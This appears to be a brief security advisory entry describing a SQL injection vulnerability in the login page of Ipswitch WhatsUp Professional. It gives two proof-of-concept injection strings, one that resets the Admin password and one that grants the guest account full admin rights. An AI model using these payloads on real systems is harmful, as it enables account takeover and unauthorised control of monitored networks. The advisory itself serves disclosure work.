|
|
Ipswitch WhatsUp Professional LOGIN.ASP SQL Injection Vulnerability
An exploit is not required. The following proof of concept is available: Reset the Admin user password with a blank password: - 'UPDATE WebUser SET sPassword=DEFAULT WHERE sUserName='Admin'-- Elevate Guest user privileges to Admin privileges: - 'UPDATE WebUser SET nUserRightsMask=-1 WHERE sUserName='guest'-- |
|
Privacy Statement |